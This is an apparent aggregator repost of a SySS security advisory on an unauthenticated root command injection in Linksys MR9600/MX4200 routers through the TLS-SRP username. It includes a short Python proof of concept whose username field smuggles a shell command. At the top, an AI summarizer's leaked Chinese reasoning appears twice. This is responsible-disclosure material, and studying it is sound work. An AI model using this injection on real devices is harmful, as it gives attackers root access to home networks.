[SYSS-2025-010] Linksys MX9600/MX4200 - OS Command Injection
好的,我现在需要帮用户总结一篇文章的内容,控制在100个字以内。用户已经提供了文章的详细内容,包括漏洞的各个方面,比如产品型号、漏洞类型、风险等级等。 首先,我要确定文章的主要信息点。这篇文章是关于Linksys路由器的安全漏洞,特别是MX4200和MR9600型号。漏洞类型是操作系统命令注入,风险等级高。攻击者可以通过TLS-SRP握手中的用户名注入命令,并以root权限执行。 接下来,我需要将这些信息浓缩成一句话,不超过100字。要确保涵盖产品、漏洞类型、攻击方式和影响。 可能会遇到的问题是如何简洁地表达攻击方式和影响。例如,“通过TLS-SRP握手注入命令”可以简化为“利用TLS-SRP握手注入命令”。 最后,检查字数是否符合要求,并确保信息准确无误。 </think> Linksys MX4200和MR9600路由器存在OS命令注入漏洞,攻击者可通过TLS-SRP握手中的用户名注入任意系统命令并以root权限执行。 2026-2-16 21:0:39 Author: seclists.org(查看原文) 阅读量:2 收藏
好的,我现在需要帮用户总结一篇文章的内容,控制在100个字以内。用户已经提供了文章的详细内容,包括漏洞的各个方面,比如产品型号、漏洞类型、风险等级等。 首先,我要确定文章的主要信息点。这篇文章是关于Linksys路由器的安全漏洞,特别是MX4200和MR9600型号。漏洞类型是操作系统命令注入,风险等级高。攻击者可以通过TLS-SRP握手中的用户名注入命令,并以root权限执行。 接下来,我需要将这些信息浓缩成一句话,不超过100字。要确保涵盖产品、漏洞类型、攻击方式和影响。 可能会遇到的问题是如何简洁地表达攻击方式和影响。例如,“通过TLS-SRP握手注入命令”可以简化为“利用TLS-SRP握手注入命令”。 最后,检查字数是否符合要求,并确保信息准确无误。 </think> Linksys MX4200和MR9600路由器存在OS命令注入漏洞,攻击者可通过TLS-SRP握手中的用户名注入任意系统命令并以root权限执行。 2026-2-16 21:0:39 Author: seclists.org(查看原文) 阅读量:2 收藏
Full Disclosure mailing list archives
From: Christian Zäske via Fulldisclosure <fulldisclosure () seclists org>
Date: Thu, 12 Feb 2026 11:13:11 +0100
Advisory ID: SYSS-2025-010 Product: MR9600, MX4200 (and potentially others) Manufacturer: LinksysAffected Version(s): 1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200 (and potentially others)
Tested Version(s): 1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2025-03-18
Solution Date: -
Public Disclosure: 2026-02-12
CVE Reference: Not yet assigned
Author of Advisory: Christian Zäske, SySS GmbH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
Linksys MX4200 is a Wi-Fi mesh router targeting home users.
The manufacturer describes the product as follows (see [1]):
"This router supports the latest Wi-Fi® 6 (802.11ax) standard for
next-level streaming and gaming. Its powerful WiFi 6 mesh coverage
offers faster WiFi performance for lag-free online gaming and
simultaneous streaming to every device and corner of your home."
Due to missing neutralization of special elements, OS commands can
be injected via the handshake of a TLS-SRP connection, which are
ultimately run as the root user.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The Linksys MR9600 (and other models) provides a service (sct_server
binary) running on TCP port 6060 (all interfaces except WAN), which is
used to integrate other mesh devices into the network. The service
accepts TLS-SRP connections with a username and password.
The service uses a different script (smcdb_auth) to receive credential
information using the given username. Since the service does not
neutralize special elements and appends the username as a command
line argument, arbitrary OS commands can be injected via the username
of the TLS-SRP handshake. These commands are run as the root user
without the need of a valid username or password.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
Using the "tlslite-ng" library, the following Python code will result
in the LED indicator at the top turning yellow, indicating that the OS
command was successfully executed. No valid username or password is
needed.
from socket import *
from tlslite.api import *
sock = socket.socket(AF_INET, SOCK_STREAM)
sock.connect(("192.168.1.1", 6060))
conn = TLSConnection(sock)
conn.handshakeClientSRP("; . /etc/led/lib_nodes_hw.sh; combo_solid
yellow on;", "dummypass")
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: There is no known solution yet. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-11-11: Vulnerability discovered 2025-03-18: Vulnerability reported to manufacturer 2025-04-07: First response from manufacturer 2025-04-14: Requested an update from manufacturer 2025-05-06: Acknowledgment of vulnerabilities by the manufacturer 2026-02-12: Public disclosure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Linksys MX4200 https://support.linksys.com/kb/article/952-en/ [2] SySS Security Advisory SYSS-2025-010 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-010.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Christian Zäske of SySS GmbH. E-Mail: christian.zaeske () syss dePublic Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_Zaeske.asc
Key ID: 0x7B00D164A32F9AC9 Key Fingerprint: 51D4 6E9B 3C29 7347 AC01 0F5A 7B00 D164 A32F 9AC9 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en
Attachment:
OpenPGP_0x7B00D164A32F9AC9.asc
Description: OpenPGP public key
Attachment:
OpenPGP_signature.asc
Description: OpenPGP digital signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- [SYSS-2025-010] Linksys MX9600/MX4200 - OS Command Injection Christian Zäske via Fulldisclosure (Feb 16)
文章来源: https://seclists.org/fulldisclosure/2026/Feb/13
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh